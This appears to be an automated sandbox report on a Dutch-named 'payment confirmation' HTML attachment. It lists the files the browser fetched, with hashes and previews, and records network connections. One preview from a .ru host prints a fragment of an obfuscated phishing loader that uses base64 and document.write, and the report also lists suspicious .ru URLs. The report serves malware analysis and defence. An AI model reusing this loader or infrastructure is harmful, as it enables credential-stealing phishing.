                                                                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:HTML document, ASCII text, with very long lines (7449), with CRLF line terminators
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):19825
                                                                                                                  Entropy (8bit):5.887553889923595
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:WKnuvEQ5ZH0C1eDVvQrfaEdlJnuvEQ5ZH0C1eDVvQrfaEdldlrflrU:7Q5Z7qKfFv1Q5Z7qKfFvdlrflrU
                                                                                                                  MD5:553DB8AA7BB94F3461C5D24DF3812AAB
                                                                                                                  SHA1:C9B2581AF1A309D3EBA54EFF5B514E6AB9F7BF1D
                                                                                                                  SHA-256:7E40EDF4753F83C9C4F6B47E1838C08357398E4FBA49E71E9FE52E0E3A8A34CE
                                                                                                                  SHA-512:061CC28FE59FB42799EC08038E698C597DC1AE2328AF6E5DF51CB7B413B7D268DC318E31A0FDBB585A650DFE3114D5D6A1FA5E9F2757335581732D61A9BDAA90
                                                                                                                  Malicious:false
                                                                                                                  URL:https://tt6l.xentore.ru/eH4dlw0/
                                                                                                                  Preview: Don&#039;t watch the clock; do what it does. Keep going. -->..<script>../* Success is getting what you want, happiness is wanting what you get. */..if(atob("aHR0cHM6Ly9UdDZsLnhlbnRvcmUucnUvZUg0ZGx3MC8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAg
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (65447)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):89501
                                                                                                                  Entropy (8bit):5.289893677458563
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                  Malicious:false
                                                                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (47691)
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):47692
                                                                                                                  Entropy (8bit):5.4016459163756165
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                                  MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                                  SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                                  SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                                  SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                                  Malicious:false
                                                                                                                  URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                                                                                                  Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  URL:https://bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru/rifemmklbecuphbjrjeRTfCOGHZFAYPELGXUEIIXJOALOEESXDWBBXBXNQOZYWLKJDTFOBXSCLPRJQOJI
                                                                                                                  Preview:1
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (65451)
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):89476
                                                                                                                  Entropy (8bit):5.2896589255084425
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                  MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                  SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                  SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                  SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                  Malicious:false
                                                                                                                  URL:https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
                                                                                                                  Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (46591)
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):142367
                                                                                                                  Entropy (8bit):5.430597817875451
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:PyeDWgSr6fTPRUbx3XCg/MJA5NOii5WLeVdgWLDY2Js0VgtWyTJmxyAXP3onrGGK:IgD1g/Mq5L9EveUynbBwsIccp
                                                                                                                  MD5:CCAA31FD031C4C856EB7B986FD9F447B
                                                                                                                  SHA1:0A809EABCDB95FA04DE5F8409B3BC994ED65CBD1
                                                                                                                  SHA-256:3D40B4129B8B4C284908636AE46D72EA053F286FB5FE45DB78351B5B2CFC1EB9
                                                                                                                  SHA-512:4B5B2271DB5F640FEBF13A7C0BDBD630C73530000F1593046D090585D1752E239D894614E23E801BE4C6A379406B6EF521423FA27C3865C3CD4ABB0A64823780
                                                                                                                  Malicious:false
                                                                                                                  URL:https://aadcdn.msftauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                                                                  Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):61
                                                                                                                  Entropy (8bit):3.990210155325004
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                  Malicious:false
                                                                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):48316
                                                                                                                  Entropy (8bit):5.6346993394709
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                  Malicious:false
                                                                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:PNG image data, 89 x 20, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):61
                                                                                                                  Entropy (8bit):4.068159130770306
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:yionv//thPlUrOyxl/k4E08up:6v/lhPi6y7Tp
                                                                                                                  MD5:B8CE282738ECFC80FC187A924B8B99A7
                                                                                                                  SHA1:61AC629F7A74524D2E4420AA3839C0D5FC8506BE
                                                                                                                  SHA-256:6FF5D6D90D15626D244F2A245E7E68738D15E781200AB7A9E117AF4580D44082
                                                                                                                  SHA-512:FE86414F8BF88B04817A21BF39B7020C4956F14AE5DC73138CD2CD3493AE3DBD84F7F42AC28E384253C2D31BB44F8223F6F9F0C91F2EEE67EF2CA876C6B3F320
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR...Y.........i..J....IDAT.....$.....IEND.B`.
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Preview:1
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (47691)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):47692
                                                                                                                  Entropy (8bit):5.4016459163756165
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                                  MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                                  SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                                  SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                                  SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                                  Malicious:false
                                                                                                                  Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):61
                                                                                                                  Entropy (8bit):3.990210155325004
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:PNG image data, 89 x 20, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):61
                                                                                                                  Entropy (8bit):4.068159130770306
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:yionv//thPlUrOyxl/k4E08up:6v/lhPi6y7Tp
                                                                                                                  MD5:B8CE282738ECFC80FC187A924B8B99A7
                                                                                                                  SHA1:61AC629F7A74524D2E4420AA3839C0D5FC8506BE
                                                                                                                  SHA-256:6FF5D6D90D15626D244F2A245E7E68738D15E781200AB7A9E117AF4580D44082
                                                                                                                  SHA-512:FE86414F8BF88B04817A21BF39B7020C4956F14AE5DC73138CD2CD3493AE3DBD84F7F42AC28E384253C2D31BB44F8223F6F9F0C91F2EEE67EF2CA876C6B3F320
                                                                                                                  Malicious:false
                                                                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f46c9ee5ddec342/1734604981425/pRF8XJBISw1z0s_
                                                                                                                  Preview:.PNG........IHDR...Y.........i..J....IDAT.....$.....IEND.B`.
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (65451)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):89476
                                                                                                                  Entropy (8bit):5.2896589255084425
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                  MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                  SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                  SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                  SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                  Malicious:false
                                                                                                                  Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (46591)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):142367
                                                                                                                  Entropy (8bit):5.430597817875451
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:PyeDWgSr6fTPRUbx3XCg/MJA5NOii5WLeVdgWLDY2Js0VgtWyTJmxyAXP3onrGGK:IgD1g/Mq5L9EveUynbBwsIccp
                                                                                                                  MD5:CCAA31FD031C4C856EB7B986FD9F447B
                                                                                                                  SHA1:0A809EABCDB95FA04DE5F8409B3BC994ED65CBD1
                                                                                                                  SHA-256:3D40B4129B8B4C284908636AE46D72EA053F286FB5FE45DB78351B5B2CFC1EB9
                                                                                                                  SHA-512:4B5B2271DB5F640FEBF13A7C0BDBD630C73530000F1593046D090585D1752E239D894614E23E801BE4C6A379406B6EF521423FA27C3865C3CD4ABB0A64823780
                                                                                                                  Malicious:false
                                                                                                                  Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)
                                                                                                                  File type:HTML document, Unicode text, UTF-8 text, with very long lines (9634), with CRLF line terminators
                                                                                                                  Entropy (8bit):4.65648749277517
                                                                                                                  TrID:
                                                                                                                  • Scalable Vector Graphics (18501/1) 31.09%
                                                                                                                  • HyperText Markup Language (12001/1) 20.17%
                                                                                                                  • HyperText Markup Language (12001/1) 20.17%
                                                                                                                  • HyperText Markup Language (11001/1) 18.49%
                                                                                                                  • HyperText Markup Language (6006/1) 10.09%
                                                                                                                  File name:NieuwBetalingsbevestigingvoor vanas.eu.htm
                                                                                                                  File size:13'688 bytes
                                                                                                                  MD5:45a162fc517caa6131a9a915d2a424b5
                                                                                                                  SHA1:5880fd63e013cddd2470d955b94389d10c845fc2
                                                                                                                  SHA256:0857ad6995b329860bb6f4347efe09527f3289d906cc041501458782b4f78238
                                                                                                                  SHA512:4c359ec280c7f28459a7c391ce651cf2d3a57fba888674c602b027d9f73b89b78c2a070f9b6eae8e6cfd89e80e6149471bf32560bc3b44628c016f69369956db
                                                                                                                  SSDEEP:384:NHgMKVgA0H41fcSlUYDdwssdpZXVWTvameQoYiqUAstQvADVl43805slAX+9NUuR:NAM97H4pcSlUYDdwss/NVWTvameQoYil
                                                                                                                  TLSH:BE5273F80B81FCD9E729820AC3C02A969D2F330765C54FA0BC5A35454BEDA25F0FE995
                                                                                                                  File Content Preview:<html>.. <head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <style>.. @font-face { font-family: system; font-style: normal; font-weight: 300; s
                                                                                                                  Icon Hash:173149cccc490307
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 19, 2024 11:42:35.951992035 CET49673443192.168.2.16204.79.197.203
                                                                                                                  Dec 19, 2024 11:42:36.264219999 CET49673443192.168.2.16204.79.197.203
                                                                                                                  Dec 19, 2024 11:42:36.873697996 CET49673443192.168.2.16204.79.197.203
                                                                                                                  Dec 19, 2024 11:42:38.079687119 CET49673443192.168.2.16204.79.197.203
                                                                                                                  Dec 19, 2024 11:42:40.341666937 CET4968980192.168.2.16192.229.211.108
                                                                                                                  Dec 19, 2024 11:42:40.493619919 CET49673443192.168.2.16204.79.197.203
                                                                                                                  Dec 19, 2024 11:42:44.116051912 CET49678443192.168.2.1620.189.173.10
                                                                                                                  Dec 19, 2024 11:42:44.417383909 CET49678443192.168.2.1620.189.173.10
                                                                                                                  Dec 19, 2024 11:42:45.021687984 CET49678443192.168.2.1620.189.173.10
                                                                                                                  Dec 19, 2024 11:42:45.308729887 CET49673443192.168.2.16204.79.197.203
                                                                                                                  Dec 19, 2024 11:42:46.234707117 CET49678443192.168.2.1620.189.173.10
                                                                                                                  Dec 19, 2024 11:42:47.612689972 CET49717443192.168.2.16172.67.131.254
                                                                                                                  Dec 19, 2024 11:42:47.612740993 CET44349717172.67.131.254192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:47.612824917 CET49717443192.168.2.16172.67.131.254
                                                                                                                  Dec 19, 2024 11:42:47.613141060 CET49717443192.168.2.16172.67.131.254
                                                                                                                  Dec 19, 2024 11:42:47.613157034 CET44349717172.67.131.254192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:48.354912043 CET49718443192.168.2.16142.250.181.100
                                                                                                                  Dec 19, 2024 11:42:48.355001926 CET44349718142.250.181.100192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:48.355103016 CET49718443192.168.2.16142.250.181.100
                                                                                                                  Dec 19, 2024 11:42:48.355365038 CET49718443192.168.2.16142.250.181.100
                                                                                                                  Dec 19, 2024 11:42:48.355400085 CET44349718142.250.181.100192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:48.583015919 CET4968080192.168.2.16192.229.211.108
                                                                                                                  Dec 19, 2024 11:42:48.647449970 CET49678443192.168.2.1620.189.173.10
